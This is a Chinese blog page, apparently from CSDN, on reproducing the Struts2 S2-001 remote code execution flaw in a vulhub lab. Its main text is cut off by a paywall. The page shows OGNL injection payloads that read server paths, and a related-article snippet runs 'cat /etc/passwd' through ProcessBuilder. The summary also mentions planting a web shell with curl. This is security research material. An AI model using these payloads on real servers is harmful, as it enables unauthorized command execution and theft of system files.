复现S2-001远程代码执行漏洞复现

最新推荐文章于 2023-03-28 16:17:17 发布

原创

最新推荐文章于 2023-03-28 16:17:17 发布 · 298 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全

本文详细介绍了如何复现S2-001远程代码执行漏洞，包括获取Tomcat路径、网站真实路径的方法，以及执行命令和利用curl命令进行挂马的过程，为网络安全研究提供了实践参考。

获取 tomcat 路径：

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取网站真实路径：

%{#req=@org.apache.struts2.ServletActionContext@getRequest

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

DXfighting_

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052（CVE-2017-9805）

qq_51577576的博客

12-15

2009

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052（CVE-2017-9805） Apache Struts2的REST插件存在远程代码执行的高危漏洞，其编号为CVE-2017-9805（S2-052）。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。

Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

weixin_55885866的博客

01-16

1325

Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2"args": {}],201表示创建成功POST /actuator/gateway/refresh HTTP/1.1Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2Win64;x64;q=0.9,*/*;q=0.8q=0.3,en;q=0.2。

参与评论您还未登录，请先登录后发表或查看评论

s2-001漏洞复现

m0_74859491的博客

03-13

674

开启docker进入vulhub —struts2—s2-001命令：cd vulhub/struts2/s2-001。执行了payload 里的语句 pwd , 回显出路径：/usr/local/tomcat。(Readme.md 英文说明， Readme.zh-cn.md 中文说明)先查看说明文件命令：cat Readme.zh-cn.md。3、启用测试环境：docker-compose up -d。回显出路径：/usr/local/tomcat。请参阅《中华人民共和国网络安全法》

【漏洞复现】---- S2-001远程代码执行漏洞

qq_43168364的博客

09-08

489

一、简介该漏洞是因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用OGNL表达式 (Struts框架使用OGNL作为默认的表达式语言，作用是对数据进行访问) %{value}进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败,后端一般会默认返回之前提交的数据，由于后端使用%{value}对提交的数据执行了一次OGNL表达式解析，所以可以直接构造Payload进行命令执行。我们来了解以下Struts2中的validation机制。validation依靠valida

struts2框架漏洞复现

Bird&Bird

01-07

7174

目录1、S2-001远程代码执行漏洞（CVE-2007-4556）漏洞简介影响范围漏洞复现S2-005 远程代码执行漏洞（CVE-2010-1870）漏洞简介影响版本绕过过程漏洞复现 1、S2-001远程代码执行漏洞（CVE-2007-4556）漏洞简介当用户提交表单数据并验证失败时，后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据中。影响范围 Struts 2.0.0 - 2.0.8 漏洞复现输入%{1+1},返回2就是存在该漏洞。获取

S2-001 远程代码执行漏洞

EC_Carrot的博客

08-05

453

漏洞简介漏洞复现执行任意命令： %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#

[struts2]s2-001

satasun的博客

12-09

349

[struts2]s2-001 环境搭建 Github buuctf poc 该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行测试一下： exp 获取Tomcat执行路径： %{@java.lang.Syste

复现S2-052远程代码执行漏洞

NLXHBM的博客

04-18

753

1.启动环境 docker-compose up -d 2.查找Ubuntu ip 3.burpsuite进行抓包 4. 发送以下数据包 POST /orders/3 HTTP/1.1 Host: 192.168.81.168:8080 Content-Length: 2419 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.81.168:8080 Conten..

复现S2-045远程代码执行漏洞

weixin_67813445的博客

03-28

315

Apache官方发布Struts 2 紧急漏洞公告（S2-045），CVE编号CVE-2017-5638。公告中披露，当基于Jakarta插件上传文件时，可导致远程代码执行。例如在系统中获得管理员权限，执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露，重要信息遭到篡改等重大危害。

S2-001 远程代码执行 漏洞复现

Senimo

07-27

3486

S2-001 远程代码执行 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接一、漏洞描述该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行。二、漏洞影响三、漏洞复现 1

S2-001 远程代码执行漏洞复现

不想当脚本小子的脚本小子

02-06

201

http://note.youdao.com/noteshare?id=09d9a796147a43e5a81126e6748a84e3&sub=E2B01A814E164ED1B0595125B1050F4D

S2-001 漏洞复现

qq_36594628的博客

07-23

541

S2-001 一、漏洞原理因用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据中。如注册或登录页面，提交失败后一般会默认返回之前提交的数据，由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析，所以可以直接构造 Payload进行命令执行。二、影响版本 Struts 2.0.0 - 2.0.8 三、复现步骤 1、docker开启服务 2、访问<虚拟机IP>:8080 注：我的虚拟

S2-001 远程代码执行漏洞(漏洞复现)

m0_65454485的博客

09-10

271

1.漏洞描述该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行影响版本: Struts 2.0.0 - Struts 2.0.8。

S2-001漏洞复现

baidu_38844729的博客

11-14

438

漏洞原理因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行漏洞利用切换到s2-001目录下，搭建启动测试环境 ...

Structs2系列漏洞 S2-001漏洞复现

weixin_43885355的博客

03-31

560

Structs2系列漏洞 S2-001漏洞复现参考链接： https://blog.youkuaiyun.com/qq_29647709/article/details/84945159 0x01漏洞简介该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{

Struts2远程代码执行漏洞复现

玄道的网安博客

07-01

521

环境搭建 docker pull medicean/vulapps:s_struts2_s2-029 docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-029 http://yourIP/default.action打开页面漏洞利用 (%23_memberAccess['allowPrivateAccess']=true,%23_memberAccess['allowProtectedAccess']=true,%23_mem

Chrome 远程代码执行漏洞复现

玄道的网安博客

04-14

598

漏洞概述攻击者利用此漏洞，可以构造一个恶意的web页面，当用户访问该页面时，会造成远程代码执行 此漏洞无法完成chrome的沙箱逃逸，默认情况下chrome开启沙箱。如需无条件rce还需要沙箱逃逸的漏洞。影响版本 Google:Chrome: <=89.0.4389.114 环境搭建这里用Chrome 89.0.4389.90进行测试开始之前，要将Chrome的sandbox关闭，直接在chrome的快捷方式--属性---位置/目标---移动到...

Log4j2 远程代码执行漏洞复现

龙卷风摧毁停车场

12-20

3308

Log4j2.14前版本，漏洞浮现

struts2漏洞复现s2-009